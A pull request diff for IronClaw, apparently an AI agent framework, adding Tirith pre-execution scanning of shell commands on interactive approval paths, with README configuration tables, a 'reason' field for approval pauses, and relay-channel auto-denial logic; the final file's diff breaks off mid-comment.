### PR TITLE
feat(security): add tirith pre-exec scanning on interactive shell approval paths

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -190,7 +190,7 @@ version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "40c48f72fd53cd289104fc64099abca73db4166ad86ea0b4341abe65af83dadc"
 dependencies = [
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -201,7 +201,7 @@ checksum = "291e6a250ff86cd4a820112fb8898808a366d8f9f58ce16d1f538353ad55747d"
 dependencies = [
  "anstyle",
  "once_cell_polyfill",
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -1044,7 +1044,7 @@ dependencies = [
  "rustc-hash 1.1.0",
  "shlex",
  "syn 2.0.117",
- "which",
+ "which 4.4.2",
 ]
 
 [[package]]
@@ -1337,7 +1337,7 @@ dependencies = [
  "cap-primitives",
  "cap-std",
  "io-lifetimes",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -1366,7 +1366,7 @@ dependencies = [
  "maybe-owned",
  "rustix 1.1.4",
  "rustix-linux-procfs",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
  "winx",
 ]
 
@@ -2408,7 +2408,7 @@ dependencies = [
  "libc",
  "option-ext",
  "redox_users 0.5.2",
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -2602,6 +2602,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "env_home"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c7f84e12ccf0a7ddc17a6c41c93326024c42920d7ee630d04950e6926645c0fe"
+
+[[package]]
 name = "equivalent"
 version = "1.0.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2614,7 +2620,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb"
 dependencies = [
  "libc",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -2738,7 +2744,7 @@ checksum = "0ce92ff622d6dadf7349484f42c93271a0d49b7cc4d466a936405bacbe10aa78"
 dependencies = [
  "cfg-if",
  "rustix 1.1.4",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -2851,7 +2857,7 @@ checksum = "94e7099f6313ecacbe1256e8ff9d617b75d1bcb16a6fddef94866d225a01a14a"
 dependencies = [
  "io-lifetimes",
  "rustix 1.1.4",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -3570,7 +3576,7 @@ dependencies = [
  "libc",
  "percent-encoding",
  "pin-project-lite",
- "socket2 0.5.10",
+ "socket2 0.6.3",
  "system-configuration",
  "tokio",
  "tower-service",
@@ -3840,7 +3846,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2285ddfe3054097ef4b2fe909ef8c3bcd1ea52a8f0d274416caebeef39f04a65"
 dependencies = [
  "io-lifetimes",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -3971,6 +3977,7 @@ dependencies = [
  "wasmtime",
  "wasmtime-wasi",
  "webpki-roots 0.26.11",
+ "which 7.0.3",
  "zbus",
  "zip",
 ]
@@ -4432,7 +4439,7 @@ checksum = "3640c1c38b8e4e43584d8df18be5fc6b0aa314ce6ebf51b53313d4306cca8e46"
 dependencies = [
  "hermit-abi",
  "libc",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -5236,7 +5243,7 @@ version = "0.50.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5"
 dependencies = [
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -6239,7 +6246,7 @@ dependencies = [
  "quinn-udp",
  "rustc-hash 2.1.2",
  "rustls 0.23.37",
- "socket2 0.5.10",
+ "socket2 0.6.3",
  "thiserror 2.0.18",
  "tokio",
  "tracing",
@@ -6276,7 +6283,7 @@ dependencies = [
  "cfg_aliases",
  "libc",
  "once_cell",
- "socket2 0.5.10",
+ "socket2 0.6.3",
  "tracing",
  "windows-sys 0.59.0",
 ]
@@ -6922,7 +6929,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.4.15",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -6935,7 +6942,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.12.1",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -7652,7 +7659,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e"
 dependencies = [
  "libc",
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -7918,7 +7925,7 @@ dependencies = [
  "fd-lock",
  "io-lifetimes",
  "rustix 0.38.44",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
  "winx",
 ]
 
@@ -7955,7 +7962,7 @@ dependencies = [
  "getrandom 0.4.2",
  "once_cell",
  "rustix 1.1.4",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -8818,7 +8825,7 @@ checksum = "f2f6fb2847f6742cd76af783a2a2c49e9375d0a111c7bef6f71cd9e738c72d6e"
 dependencies = [
  "memoffset",
  "tempfile",
- "windows-sys 0.60.2",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -9669,6 +9676,18 @@ dependencies = [
 ]
 
 [[package]]
+name = "which"
+version = "7.0.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "24d643ce3fd3e5b54854602a080f34fb10ab75e0b813ee32d00ca2b44fa74762"
+dependencies = [
+ "either",
+ "env_home",
+ "rustix 1.1.4",
+ "winsafe",
+]
+
+[[package]]
 name = "whoami"
 version = "2.1.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -9743,7 +9762,7 @@ version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
 dependencies = [
- "windows-sys 0.48.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -10091,13 +10110,19 @@ dependencies = [
 ]
 
 [[package]]
+name = "winsafe"
+version = "0.0.19"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d135d17ab770252ad95e9a872d365cf3090e3be864a34ab46f48555993efc904"
+
+[[package]]
 name = "winx"
 version = "0.36.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "3f3fd376f71958b862e7afb20cfe5a22830e1963462f3a17f49d82a6c1d1f42d"
 dependencies = [
  "bitflags 2.11.0",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -131,6 +131,7 @@ serde_yml = "0.0.12"
 dirs = "6"
 fs4 = "0.6"
 glob = "0.3"
+which = "7"
 
 # Semantic versioning
 semver = "1"

--- a/README.md
+++ b/README.md
@@ -229,6 +229,72 @@ External content passes through multiple security layers:
 - No telemetry, analytics, or data sharing
 - Full audit log of all tool executions
 
+### Tirith pre-exec command scanning
+
+[Tirith](https://github.com/sheeki03/tirith) is an external terminal-security
+CLI that intercepts shell commands and inspects them for homograph URLs,
+pipe-to-shell patterns, ANSI/bidi terminal injection, obfuscated payloads,
+data-exfiltration, and similar attacks before they execute. IronClaw runs
+Tirith as a subprocess on every shell tool call that passes through the
+**interactive shell approval paths** (v1 dispatcher initial path, v1
+thread_ops deferred-replay path, and v2 effect bridge), so a flagged
+command surfaces as an approval prompt instead of running unattended.
+
+Tirith verdicts (block / warn / warn_ack) all become approvable prompts
+with `allow_always = false` — users cannot permanently allow-list a
+finding. **Fail-closed is a hard denial, not approvable**: when
+`safety.tirith_fail_open = false` and Tirith is missing, times out, or
+returns an unknown exit, the call is rejected outright rather than
+surfacing as a prompt the user could click through.
+
+Default-on with fail-open: machines without Tirith on PATH see no
+behavior change.
+
+#### Install
+
+| Method                | Command                                                              |
+|-----------------------|----------------------------------------------------------------------|
+| Homebrew              | `brew install sheeki03/tap/tirith`                                   |
+| Cargo                 | `cargo install tirith`                                               |
+| Release tarball / zip | <https://github.com/sheeki03/tirith/releases>                        |
+
+#### Configuration
+
+| Setting                       | Default     | Env var                       | Notes                                                                                |
+|-------------------------------|-------------|-------------------------------|--------------------------------------------------------------------------------------|
+| `safety.tirith_enabled`       | `true`      | `SAFETY_TIRITH_ENABLED`       | Master switch. `false` short-circuits before any subprocess spawn.                   |
+| `safety.tirith_bin`           | `tirith`    | `SAFETY_TIRITH_BIN`           | Bare name (PATH-resolved via `which`) or explicit path. `~/...` is expanded.         |
+| `safety.tirith_timeout_ms`    | `5000`      | `SAFETY_TIRITH_TIMEOUT_MS`    | Per-scan subprocess timeout.                                                         |
+| `safety.tirith_fail_open`     | `true`      | `SAFETY_TIRITH_FAIL_OPEN`     | `false` hard-denies on missing binary, timeout, or unknown exit (never approvable).  |
+
+#### Behavior matrix
+
+| Tirith state                          | `fail_open=true` (default)                              | `fail_open=false`                                          |
+|---------------------------------------|---------------------------------------------------------|------------------------------------------------------------|
+| Binary present, exit 0 (Allow)        | Tool runs (subject to existing approval rules)          | Tool runs (subject to existing approval rules)             |
+| Binary present, exit 1 (Block)        | Approval prompt with finding, `allow_always = false`    | Approval prompt with finding, `allow_always = false`       |
+| Binary present, exit 2 (Warn)         | Approval prompt with finding, `allow_always = false`    | Approval prompt with finding, `allow_always = false`       |
+| Binary present, exit 3 (WarnAck)      | Approval prompt with finding, `allow_always = false`    | Approval prompt with finding, `allow_always = false`       |
+| Binary missing / spawn fail / timeout | Falls through to existing approval logic                | **Hard rejection** (never an approval prompt)              |
+| Binary present, unknown exit          | Falls through to existing approval logic                | **Hard rejection** (never an approval prompt)              |
+| Tool != `shell` (e.g. `http`)         | Helper short-circuits to Allow before spawn             | Helper short-circuits to Allow before spawn                |
+
+#### Coverage in this release
+
+| Path                                                              | Scanned? |
+|-------------------------------------------------------------------|----------|
+| v1 dispatcher initial tool-call (`src/agent/dispatcher.rs`)       | Yes      |
+| v1 thread_ops deferred-replay (`src/agent/thread_ops.rs`)         | Yes      |
+| v2 effect bridge (`src/bridge/effect_adapter.rs`)                 | Yes      |
+| Autonomous worker / job (`src/worker/job.rs`)                     | Not yet  |
+| Scheduler (`src/agent/scheduler.rs`)                              | Not yet  |
+| Routine engine (`src/agent/routine_engine.rs`)                    | Not yet  |
+| Container-mode shell dispatch                                     | Not yet  |
+| Inline `ShellTool::execute_command` defense-in-depth              | Not yet  |
+
+The non-interactive paths and the inline defense-in-depth guard are
+deliberate follow-ups — see the design notes in the upstream PR.
+
 ## Architecture
 
 ```

--- a/crates/ironclaw_engine/src/executor/orchestrator.rs
+++ b/crates/ironclaw_engine/src/executor/orchestrator.rs
@@ -1030,7 +1030,7 @@ async fn handle_execute_code_step(
                 "had_error": result.failure.is_some(),
                 "pending_gate": result.need_approval.as_ref().map(|na| {
                     match na {
-                        ThreadOutcome::GatePaused { gate_name, action_name, call_id, parameters, resume_kind, resume_output, paused_lease } => serde_json::json!({
+                        ThreadOutcome::GatePaused { gate_name, action_name, call_id, parameters, resume_kind, resume_output, paused_lease, reason } => serde_json::json!({
                             "gate_paused": true,
                             "gate_name": gate_name,
                             "action_name": action_name,
@@ -1039,6 +1039,7 @@ async fn handle_execute_code_step(
                             "resume_kind": serde_json::to_value(resume_kind).unwrap_or_default(),
                             "resume_output": resume_output,
                             "paused_lease": paused_lease,
+                            "reason": reason,
                         }),
                         _ => serde_json::Value::Null,
                     }
@@ -1351,6 +1352,7 @@ async fn handle_execute_action(
             resume_kind,
             resume_output,
             paused_lease,
+            reason,
         }) => {
             let _ = leases.refund_use(lease.id).await;
             let output = serde_json::json!({"status": "gate_paused", "gate_name": gate_name});
@@ -1361,7 +1363,7 @@ async fn handle_execute_action(
                     action_name: name.clone(),
                     call_id: call_id.clone(),
                     parameters: Some((*parameters).clone()),
-                    description: None,
+                    description: reason.as_deref().cloned(),
                     allow_always: match resume_kind.as_ref() {
                         crate::gate::ResumeKind::Approval { allow_always } => Some(*allow_always),
                         _ => None,
@@ -1904,13 +1906,14 @@ async fn execute_single_action(
             resume_kind,
             resume_output,
             paused_lease,
+            reason,
         }) => {
             let output = serde_json::json!({"status": "gate_paused", "gate_name": &gate_name});
             let event = EventKind::ApprovalRequested {
                 action_name: name.to_string(),
                 call_id: call_id.to_string(),
                 parameters: Some((*parameters).clone()),
-                description: None,
+                description: reason.as_deref().cloned(),
                 allow_always: match resume_kind.as_ref() {
                     crate::gate::ResumeKind::Approval { allow_always } => Some(*allow_always),
                     _ => None,
@@ -2875,6 +2878,10 @@ fn parse_outcome(result: &serde_json::Value) -> ThreadOutcome {
                     .get("paused_lease")
                     .cloned()
                     .and_then(|value| serde_json::from_value(value).ok()),
+                reason: result
+                    .get("reason")
+                    .and_then(|v| v.as_str())
+                    .map(|s| Box::new(s.to_string())),
             }
         }
         _ => ThreadOutcome::Completed { response: None },
@@ -3797,6 +3804,7 @@ mod tests {
             resume_kind: crate::gate::ResumeKind::Approval { allow_always: true },
             resume_output: None,
             paused_lease: None,
+            reason: None,
         };
         normalize_pause_outcome(&mut thread, &outcome).unwrap();
         assert_eq!(thread.state, ThreadState::Waiting);

--- a/crates/ironclaw_engine/src/executor/scripting.rs
+++ b/crates/ironclaw_engine/src/executor/scripting.rs
@@ -1232,6 +1232,7 @@ async fn preflight_action(
                         resume_kind: crate::gate::ResumeKind::Approval { allow_always: true },
                         resume_output: None,
                         paused_lease: None,
+                        reason: None,
                     },
                 );
             }

--- a/crates/ironclaw_engine/src/executor/structured.rs
+++ b/crates/ironclaw_engine/src/executor/structured.rs
@@ -213,6 +213,7 @@ pub async fn execute_action_calls(
                         resume_kind: crate::gate::ResumeKind::Approval { allow_always: true },
                         resume_output: None,
                         paused_lease: None,
+                        reason: None,
                     }),
                 });
             }
@@ -374,6 +375,11 @@ pub async fn execute_action_calls(
                         .get("paused_lease")
                         .cloned()
                         .and_then(|value| serde_json::from_value(value).ok()),
+                    reason: result
+                        .output
+                        .get("reason")
+                        .and_then(|v| v.as_str())
+                        .map(|s| Box::new(s.to_string())),
                 });
             }
             results.push(result);
@@ -462,6 +468,7 @@ fn classify_exec_result(
             resume_kind,
             resume_output,
             paused_lease,
+            reason,
         }) => {
             let _error_msg = format!("gate paused: {gate_name}");
             let error_result = ActionResult {
@@ -473,6 +480,7 @@ fn classify_exec_result(
                     "resume_kind": serde_json::to_value(&*resume_kind).unwrap_or_default(),
                     "resume_output": resume_output.as_deref().cloned(),
                     "paused_lease": paused_lease.as_deref().cloned(),
+                    "reason": reason,
                 }),
                 is_error: true,
                 duration: std::time::Duration::ZERO,
@@ -481,7 +489,11 @@ fn classify_exec_result(
                 action_name,
                 call_id,
                 parameters: Some((*parameters).clone()),
-                description: None,
+                // Carry the engine-supplied reason (e.g. tirith finding) so
+                // trace observers and the v2 router see the same description
+                // regardless of which executor path produced the pause.
+                // Symmetric with orchestrator.rs:1366 / :1916.
+                description: reason.as_deref().cloned(),
                 allow_always: match *resume_kind {
                     crate::gate::ResumeKind::Approval { allow_always } => Some(allow_always),
                     _ => None,
@@ -980,6 +992,7 @@ mod tests {
                 }),
                 resume_output: None,
                 paused_lease: None,
+                reason: None,
             })],
         ));
         let leases = Arc::new(LeaseManager::new());
@@ -1064,6 +1077,7 @@ mod tests {
                     }),
                     resume_output: None,
                     paused_lease: None,
+                    reason: None,
                 }),
                 Ok(ActionResult {
                     call_id: String::new(),

--- a/crates/ironclaw_engine/src/runtime/messaging.rs
+++ b/crates/ironclaw_engine/src/runtime/messaging.rs
@@ -56,6 +56,11 @@ pub enum ThreadOutcome {
         /// `large_enum_variant` threshold — `CapabilityLease` is ~360
         /// bytes and would otherwise dominate the whole enum's size.
         paused_lease: Option<Box<crate::types::capability::CapabilityLease>>,
+        /// Optional human-readable reason for the pause (e.g. tirith finding
+        /// summary). When `None`, downstream renderers (router.rs PendingGate
+        /// description, mission notifications) fall back to a generic format.
+        /// Boxed for the same `large_enum_variant` reason as `paused_lease`.
+        reason: Option<Box<String>>,
     },
 }
 

--- a/crates/ironclaw_engine/src/runtime/mission.rs
+++ b/crates/ironclaw_engine/src/runtime/mission.rs
@@ -4223,6 +4223,7 @@ mod tests {
             },
             resume_output: None,
             paused_lease: None,
+            reason: None,
         };
 
         process_mission_outcome_and_notify(
@@ -4724,6 +4725,7 @@ mod tests {
                     }),
                     resume_output: None,
                     paused_lease: None,
+                    reason: None,
                 });
             }
             Ok(ActionResult {

--- a/crates/ironclaw_engine/src/types/error.rs
+++ b/crates/ironclaw_engine/src/types/error.rs
@@ -149,6 +149,12 @@ pub enum EngineError {
         resume_kind: Box<crate::gate::ResumeKind>,
         resume_output: Option<Box<serde_json::Value>>,
         paused_lease: Option<Box<crate::types::capability::CapabilityLease>>,
+        /// Optional human-readable reason for the pause (e.g. tirith finding
+        /// summary). When `None`, downstream renderers fall back to a generic
+        /// "Tool 'X' requires Y" string. Boxed to keep the variant under
+        /// clippy's `result_large_err` threshold (matches the existing
+        /// `Option<Box<...>>` pattern on `resume_output` / `paused_lease`).
+        reason: Option<Box<String>>,
     },
 }
 

--- a/src/agent/dispatcher.rs
+++ b/src/agent/dispatcher.rs
@@ -872,7 +872,8 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
             usize,
             crate::llm::ToolCall,
             Arc<dyn crate::tools::Tool>,
-            bool, // allow_always
+            bool,           // allow_always
+            Option<String>, // optional tirith-supplied description override
         )> = None;
 
         for (idx, original_tc) in tool_calls.iter().enumerate() {
@@ -937,6 +938,80 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
                 _ => {}
             }
 
+            // Tirith pre-exec scan runs before the auto_approve_tools
+            // shortcut so a malicious shell command cannot be auto-approved
+            // around the scanner. The helper short-circuits to Allow when
+            // tirith is disabled, the tool is not "shell", or no command
+            // parameter is present.
+            let in_non_dm_relay = {
+                let is_relay = self.message.channel.ends_with("-relay");
+                let is_dm = self
+                    .message
+                    .metadata
+                    .get("event_type")
+                    .and_then(|v| v.as_str())
+                    == Some("direct_message");
+                is_relay && !is_dm
+            };
+
+            // Use the resolved tool's canonical `name()`, not `tc.name` —
+            // an alias the LLM used for `shell` would otherwise let the
+            // call sneak past the helper's `tool_name == "shell"` check.
+            let tirith_decision = match (tool_opt.as_ref(), self.agent.tools().tirith_config()) {
+                (Some(tool), Some(cfg)) => {
+                    crate::tools::builtin::tirith_preflight(tool.name(), &tc.arguments, cfg).await
+                }
+                _ => crate::tools::builtin::TirithPreflightDecision::Allow,
+            };
+
+            match tirith_decision {
+                crate::tools::builtin::TirithPreflightDecision::Allow => {}
+                crate::tools::builtin::TirithPreflightDecision::Approval { reason } => {
+                    // Tirith findings are approval-requiring. Apply the same
+                    // relay-channel auto-deny as plain approval-requiring
+                    // calls (anti-injection / stuck-AwaitingApproval reasons
+                    // apply equally to tirith findings).
+                    if in_non_dm_relay {
+                        // Tirith integration uses `tracing::debug!` per the
+                        // plan/repo guidance; do not promote to info even
+                        // though nearby non-tirith relay logging is at info.
+                        tracing::debug!(
+                            tool = %tc.name,
+                            channel = %self.message.channel,
+                            "Auto-denying tirith-flagged tool in non-DM relay channel"
+                        );
+                        let reject_msg = format!(
+                            "Tool '{}' was flagged by content scanning and cannot run in \
+                             shared channels. Ask the user to message me directly (DM) to \
+                             use this tool. Finding: {}",
+                            tc.name, reason
+                        );
+                        preflight.push((tc, PreflightOutcome::Rejected(reject_msg)));
+                        continue;
+                    }
+                    let Some(tool) = tool_opt.clone() else {
+                        // No tool registered for this name; let the existing
+                        // logic produce the standard "unknown tool" rejection
+                        // path instead of holding a tirith approval prompt.
+                        continue;
+                    };
+                    approval_needed = Some((idx, tc, tool, false, Some(reason)));
+                    break;
+                }
+                crate::tools::builtin::TirithPreflightDecision::Deny { reason } => {
+                    tracing::debug!(
+                        tool = %tc.name,
+                        "Tirith denied tool call (fail-closed)"
+                    );
+                    let reject_msg = format!(
+                        "Tool '{}' was rejected by content scanning: {}",
+                        tc.name, reason
+                    );
+                    preflight.push((tc, PreflightOutcome::Rejected(reject_msg)));
+                    continue;
+                }
+            }
+
             // Check if tool requires approval
             if !self.agent.config.auto_approve_tools
                 && let Some(tool) = tool_opt
@@ -956,14 +1031,7 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
                     // In non-DM relay channels, auto-deny approval-
                     // requiring tools to prevent stuck AwaitingApproval
                     // state and prompt injection from other users.
-                    let is_relay = self.message.channel.ends_with("-relay");
-                    let is_dm = self
-                        .message
-                        .metadata
-                        .get("event_type")
-                        .and_then(|v| v.as_str())
-                        == Some("direct_message");
-                    if is_relay && !is_dm {
+                    if in_non_dm_relay {
                         tracing::info!(
                             tool = %tc.name,
                             channel = %self.message.channel,
@@ -979,7 +1047,7 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
                     }
 
                     let allow_always = !matches!(requirement, ApprovalRequirement::Always);
-                    approval_needed = Some((idx, tc, tool, allow_always));
+                    approval_needed = Some((idx, tc, tool, allow_always, None));
                     break;
                 }
             }
@@ -1303,7 +1371,8 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
         // Approval pauses take precedence over surfacing auth prompts. Persist
         // the prompt so it can be replayed after approval, and also emit it now
         // so the user sees the connect button alongside the approval card.
-        if let Some((approval_idx, tc, tool, allow_always)) = approval_needed {
+        if let Some((approval_idx, tc, tool, allow_always, description_override)) = approval_needed
+        {
             if let Some((ref ext_name, ref auth_data)) = selected_auth_prompt {
                 emit_auth_required_status(
                     &self.agent.channels,
@@ -1323,7 +1392,7 @@ impl<'a> LoopDelegate for ChatDelegate<'a> {
                 tool_name: tc.name.clone(),
                 parameters: tc.arguments.clone(),
                 display_parameters: display_params,
-                description: tool.description().to_string(),
+                description: description_override.unwrap_or_else(|| tool.description().to_string()),
                 tool_call_id: tc.id.clone(),
                 context_messages: reason_ctx.messages.clone(),
                 deferred_tool_calls: tool_calls[approval_idx + 1..].to_vec(),

--- a/src/agent/thread_ops.rs
+++ b/src/agent/thread_ops.rs
@@ -1689,17 +1689,78 @@ impl Agent {
 
             // === Phase 1: Preflight (sequential) ===
             // Walk deferred tools checking approval. Collect runnable
-            // tools; stop at the first that needs approval.
-            let mut runnable: Vec<crate::llm::ToolCall> = Vec::new();
-            let mut approval_needed: Option<(
+            // tools; stop at the first that needs approval. The 5-tuple
+            // shape mirrors the same loop in `src/agent/dispatcher.rs` —
+            // kept module-local since it's per-loop scratch state, not API.
+            type ApprovalNeeded = (
                 usize,
                 crate::llm::ToolCall,
                 Arc<dyn crate::tools::Tool>,
-                bool, // allow_always
-            )> = None;
+                bool,           // allow_always
+                Option<String>, // optional tirith-supplied description override
+            );
+            let mut runnable: Vec<crate::llm::ToolCall> = Vec::new();
+            let mut approval_needed: Option<ApprovalNeeded> = None;
 
-            for (idx, tc) in deferred_tool_calls.iter().enumerate() {
+            // Deferred tool calls inherit the channel of the originating
+            // message. Mirror dispatcher.rs's relay auto-deny so a tirith
+            // finding (or any approval prompt) cannot get stuck or be prompt-
+            // injected from a shared channel.
+            let in_non_dm_relay_deferred = {
+                let is_relay = message.channel.ends_with("-relay");
+                let is_dm = message.metadata.get("event_type").and_then(|v| v.as_str())
+                    == Some("direct_message");
+                is_relay && !is_dm
+            };
+
+            // Indices of deferred tool calls rejected synchronously by tirith
+            // (Deny outcome, or relay-channel rejection of a flagged call).
+            // Captured here so the post-flight loop can push synthetic tool-
+            // result messages for them — the existing post-flight code only
+            // walks `runnable`, so anything we want sanitized + recorded in
+            // context must show up either in runnable or in the rejection
+            // bookkeeping below.
+            let mut deferred_rejections: Vec<(usize, crate::llm::ToolCall, String)> = Vec::new();
+
+            'preflight: for (idx, tc) in deferred_tool_calls.iter().enumerate() {
                 if let Some(tool) = self.tools().get(&tc.name).await {
+                    // Tirith pre-exec scan runs first — auto_approve_tools
+                    // cannot bypass it. Scan the resolved tool's canonical
+                    // `name()`, not `tc.name`, so a shell alias cannot
+                    // sneak past the helper's `tool_name == "shell"` check.
+                    let tirith_decision = match self.tools().tirith_config() {
+                        Some(cfg) => {
+                            crate::tools::builtin::tirith_preflight(tool.name(), &tc.arguments, cfg)
+                                .await
+                        }
+                        None => crate::tools::builtin::TirithPreflightDecision::Allow,
+                    };
+                    match tirith_decision {
+                        crate::tools::builtin::TirithPreflightDecision::Allow => {}
+                        crate::tools::builtin::TirithPreflightDecision::Approval { reason } => {
+                            if in_non_dm_relay_deferred {
+                                let reject_msg = format!(
+                                    "Tool '{}' was flagged by content scanning and cannot run \
+                                     in shared channels. Ask the user to message me directly \
+                                     (DM) to use this tool. Finding: {}",
+                                    tc.name, reason
+                                );
+                                deferred_rejections.push((idx, tc.clone(), reject_msg));
+                                continue 'preflight;
+                            }
+                            approval_needed = Some((idx, tc.clone(), tool, false, Some(reason)));
+                            break 'preflight;
+                        }
+                        crate::tools::builtin::TirithPreflightDecision::Deny { reason } => {
+                            let reject_msg = format!(
+                                "Tool '{}' was rejected by content scanning: {}",
+                                tc.name, reason
+                            );
+                            deferred_rejections.push((idx, tc.clone(), reject_msg));
+                            continue 'preflight;
+                        }
+                    }
+
                     // Match dispatcher.rs: when auto_approve_tools is true, skip
                     // all approval checks (including ApprovalRequirement::Always).
                     let (needs_approval, allow_always) = if self.config.auto_approve_tools {
@@ -1719,7 +1780,7 @@ impl Agent {
                     };
 
                     if needs_approval {
-                        approval_needed = Some((idx, tc.clone(), tool, allow_always));
+                        approval_needed = Some((idx, tc.clone(), tool, allow_always, None));
                         break; // remaining tools stay deferred
                     }
                 }
@@ -1870,8 +1931,63 @@ impl Agent {
             // === Phase 3: Post-flight (sequential, in original order) ===
             // Process all results before any conditional return so every
             // tool result is recorded in the session audit trail.
+            //
+            // Order is the original deferred-call order. Tirith-driven
+            // rejections (Deny / relay-channel block) and runnable execution
+            // results are interleaved here so that for a deferred sequence
+            // `[A=runnable, B=rejected, C=runnable]` the LLM sees
+            // A-result, B-rejection, C-result rather than B-rejection
+            // sandwiched outside the runnable pair.
+            let approval_idx_limit = approval_needed.as_ref().map(|n| n.0).unwrap_or(usize::MAX);
+            let mut rejection_by_id: std::collections::HashMap<String, String> =
+                deferred_rejections
+                    .into_iter()
+                    .map(|(_, tc, msg)| (tc.id, msg))
+                    .collect();
+            let mut exec_by_id: std::collections::HashMap<String, Result<String, Error>> =
+                exec_results.into_iter().map(|(tc, r)| (tc.id, r)).collect();
 
-            for (tc, deferred_result) in exec_results {
+            for (idx, tc) in deferred_tool_calls.iter().enumerate() {
+                if idx >= approval_idx_limit {
+                    break;
+                }
+
+                if let Some(reject_msg) = rejection_by_id.remove(&tc.id) {
+                    let synthetic: Result<String, String> = Err(reject_msg);
+                    let (deferred_content, _) = crate::tools::execute::process_tool_result(
+                        self.safety(),
+                        &tc.name,
+                        &tc.id,
+                        &synthetic,
+                    );
+                    {
+                        let mut sess = session.lock().await;
+                        if let Some(thread) = sess.threads.get_mut(&thread_id)
+                            && let Some(turn) = thread.last_turn_mut()
+                        {
+                            turn.record_tool_error_for(&tc.id, deferred_content.clone());
+                        }
+                    }
+                    context_messages.push(ChatMessage::tool_result(
+                        &tc.id,
+                        &tc.name,
+                        deferred_content,
+                    ));
+                    continue;
+                }
+
+                let Some(deferred_result) = exec_by_id.remove(&tc.id) else {
+                    // Defensive: an unmatched id here would mean Phase-1
+                    // book-keeping drifted. Skip rather than panic so a
+                    // single inconsistency doesn't drop the entire turn.
+                    tracing::debug!(
+                        %thread_id,
+                        tool = %tc.name,
+                        "deferred tool call had no execution result and no rejection — skipping"
+                    );
+                    continue;
+                };
+
                 if let Ok(ref output) = deferred_result
                     && !output.is_empty()
                 {
@@ -1931,7 +2047,9 @@ impl Agent {
             }
 
             // Handle approval if a tool needed it
-            if let Some((approval_idx, tc, tool, allow_always)) = approval_needed {
+            if let Some((approval_idx, tc, tool, allow_always, description_override)) =
+                approval_needed
+            {
                 // Emit auth prompt alongside the approval card so the user
                 // sees the connect button without waiting for approval to resolve.
                 if let Some((ref ext_name, ref auth_data)) = selected_auth_prompt {
@@ -1952,7 +2070,8 @@ impl Agent {
                     tool_name: tc.name.clone(),
                     parameters: tc.arguments.clone(),
                     display_parameters: redact_params(&tc.arguments, tool.sensitive_params()),
-                    description: tool.description().to_string(),
+                    description: description_override
+                        .unwrap_or_else(|| tool.description().to_string()),
                     tool_call_id: tc.id.clone(),
                     context_messages: context_messages.clone(),
                     deferred_tool_calls: deferred_tool_calls[approval_idx + 1..].to_vec(),

--- a/src/app.rs
+++ b/src/app.rs
@@ -516,7 +516,9 @@ impl AppBuilder {
         } else {
             crate::tools::EngineVersion::V1
         };
-        let mut registry = ToolRegistry::new().with_engine_version(engine_version);
+        let mut registry = ToolRegistry::new()
+            .with_engine_version(engine_version)
+            .with_tirith_config(self.config.tirith.clone());
         if let Some(ref db) = self.db {
             registry = registry.with_database(Arc::clone(db));
         }

--- a/src/bridge/effect_adapter.rs
+++ b/src/bridge/effect_adapter.rs
@@ -342,6 +342,54 @@ impl EffectBridgeAdapter {
             PermissionState::AlwaysAllow | PermissionState::AskEachTime => {}
         }
 
+        // Tirith pre-exec scan. Block / Warn / WarnAck become approval-
